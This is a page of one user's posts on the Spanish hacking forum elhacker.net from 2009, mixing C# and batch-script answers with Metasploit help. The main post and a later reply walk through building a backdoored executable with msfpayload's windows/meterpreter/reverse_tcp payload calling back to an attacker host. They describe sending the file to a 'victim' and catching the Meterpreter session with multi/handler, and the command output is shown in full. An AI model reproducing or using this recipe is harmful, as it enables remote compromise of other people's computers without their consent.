elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 ... 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 [365] 366 367 368
3641  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] estado de conexion sql con bindingsource en: 30 Diciembre 2009, 03:01 am
Creo que el DataGridView tiene un evento para eso. Buscarlo!
Pero miraté esto http://www.onglasses.net/Default.aspx?id=1199

Saludos!
3642  Programación / Scripting / Re: Cambiar Fondo de Pc en: 30 Diciembre 2009, 02:51 am
Código:
@echo off
cd %homedrive%\
rem El wallpaper que quieren poner, debe de estar en su disco local %homedrive%\
rem Cambiando el Wallpaper by RockoX
set Ruta de mi wallpaper=Dibujo.bmp
copy /y %Ruta de mi wallpaper% "%homepath%\Local settings\Application data\Microsoft\Wallpaper1.bmp" > nul
reg add "hkey_current_user\Control panel\Desktop" /v ConvertedWallpaper /t reg_sz /d %homedrive%\Dibujo.bmp /f > nul
reg add "Hkey_current_user\Control panel\Desktop" /v Wallpaper /t reg_sz /d "%homepath%\Local settings\Application data\Microsoft\Wallpaper1.bmp" /f > nul
shutdown -l
goto:eof

Nota: El code es de Leo Gutierrez.

Saludines!
3643  Seguridad Informática / Hacking / Re: Duda con Meterpreter. en: 30 Diciembre 2009, 02:44 am
Podes ver un ejemplo aquí http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html
3644  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] estado de conexion sql con bindingsource en: 30 Diciembre 2009, 02:42 am
Con la variable Cnn Tipo SQLConnection y con la Propiedad State
3645  Seguridad Informática / Hacking / [Metasploit] Generando Ejecutable con PAYLOAD en: 30 Diciembre 2009, 02:32 am
Generando Ejecutable con PAYLOAD
[Metasploit By: Shell Root]



Despues de explotar la vulnerabilidad en sistemas Windows XP SP 2 [445/tcp "Microsoft Windows XP microsoft-ds"] con el exploit exploit/windows/smb/ms08_067_netapi. Ahora veremos como obtener una session del Meterpreter cuando la victima ejecute un archivo Ejecutable.

Primero generamos el ejecutable con el PAYLOAD windows/meterpreter/reverse_tcp. Así, desde la Shell de Linux:
Código:
shell@ShellRoot:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=5555 X > /home/shell/hola.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=192.168.0.5,LPORT=5555
shell@ShellRoot:~/msf3$

Nota: Me toco hacerlo desde Linux porque en W1nd0w$, no me funco el parametro X >.

Ahora revizamos la ruta /home/shell/hola.exe y miramos que existe el archivo.



Mandamos el archivo a la Victima, pero antes de ello, debemos configurar el Auxiliary multi/handler, de esta forma:

Código:
shell@ShellRoot:~/msf3$ ./msfconsole

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > use multi/handler

Cabe decir de que debemos de configurar de nuevo el PAYLOAD puesto dentro de archivo ejecutable que creamos al inicio (hola.exe), ponemos los mismos datos. Así:
Código:
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555

Ahora es tiempo de ejecutar nuestro Auxiliary. Pero ejecutarémos digamos que en un "segundo plano", a la espera de que la victima abra el ejecutable que le mandamos. Así:

Código:
msf exploit(handler) > exploit -j
[*] exploit Running as background job.

[*] Starting the payload handler...
[*] Started reverse handler on port 5555
msf exploit(handler) >

Ahora es cuestion de esperar a que la victima abra el archivo y obtendrémos la session del Meterpreter. Supongamos que pasaron varios minutos y que la victima abrio el archivo, nos debe de aparecer esto:

Código:
msf exploit(handler) > [*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.5:5555 -> 192.168.0.2:11735)

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/generando-ejecutable-con-payload.html
Video: Nothing...

Saludos!
3646  Seguridad Informática / Hacking / Re: Duda con Meterpreter. en: 29 Diciembre 2009, 21:47 pm
el uso del multi/handler en msf lo puedo hacer desde win?
Simon!, es el mismo Metasploit! Solo cambia el S.O :P
3647  Seguridad Informática / Hacking / Re: Duda con Meterpreter. en: 29 Diciembre 2009, 20:57 pm
hey, lo unico que debo hacer en linux es el ejecutable correcto?
luego lo puedo utilizar en un win cierto?
Simon! :P No podes ejecutar el .EXE en Linux :P
3648  Seguridad Informática / Hacking / Re: Duda con Meterpreter. en: 29 Diciembre 2009, 20:13 pm
A ver:
  • El Metasploit no funciona con NetCat

  • Podemos BackDoorizar un ejecutable con un PAYLOAD
De está forma:
Código:
./msfpayload [PAYLOAD] [<Parametros del PAYLOAD>] [Parametros de creacion del PAYLOAD X= Ejecutable] > [RUTA_DE_CREACIÓN_DEL_ARCHIVO]


Ejemplo:
Código:
./msfpayload windows/meterpreter/reverse_tcp LHOST=[IP_LOCAL] LPORT=[PUERTO_LOCAL] X > /home/Meterpreter.exe

Ahora tenemos un ejecutable llamado Meterpreter.exe, enviamos esto a P.C Victima. Despues de ello, abrimos el Metasploit y lanzamos el Auxiliar multi/handler. Dentro de está "consola" debemos especificar el PAYLOAD utilizado en el Ejecutable, e ingresar de nuevo el LPORT y LHOST. Ahora estamos listo de ejecutar el Auxiliar multi/handler con el comando exploit y veremos las sessiones del Meterpreter en las P.C Infectadas por el Ejecutable que creamos.

Nota: No sé porque en el PUTO W1nd0w$! no funciona le creación de los PAYLOAD en ejecutables, no funka el parametro X >. Así que creo que tendrias que usar esto dentro de un entorno Linux.
3649  Programación / .NET (C#, VB.NET, ASP) / Re: Como insertar un dato (DateTime) desde C# en: 29 Diciembre 2009, 02:32 am
Cual es el valor de esa variable?
3650  Seguridad Informática / Hacking / Re: Duda Metasploit en: 29 Diciembre 2009, 02:30 am
Son varios Factores
  • Firewall
  • Puertos Cerrados
  • Antivirus
  • Que él sistema no es vulnerable
Páginas: 1 ... 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 [365] 366 367 368
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines